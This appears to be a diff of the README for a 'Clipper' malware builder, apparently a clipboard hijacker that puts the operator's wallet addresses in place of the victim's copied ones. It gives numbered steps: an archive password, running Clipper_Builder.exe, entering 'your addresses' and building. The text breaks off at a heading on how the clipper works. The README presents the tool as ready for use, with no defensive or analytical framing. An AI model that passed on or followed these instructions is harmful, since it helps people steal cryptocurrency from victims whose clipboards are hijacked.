Gl0bster/Clipper/README.md

 # How to install:

+1. The password for the archive is - 123
-1. Run Clipper_Builder.exe
+2. Run Clipper_Builder.exe
-2. Enter your addresses.
+3. Enter your addresses.
-3. Сlick on the build button.
+4. Сlick on the build button.
-4. Ok, it's ready.
+5. Ok, it's ready.
 Your build will be saved to the "Release" folder.
 "Clipper folder\Release"

 # How the Clipper Works: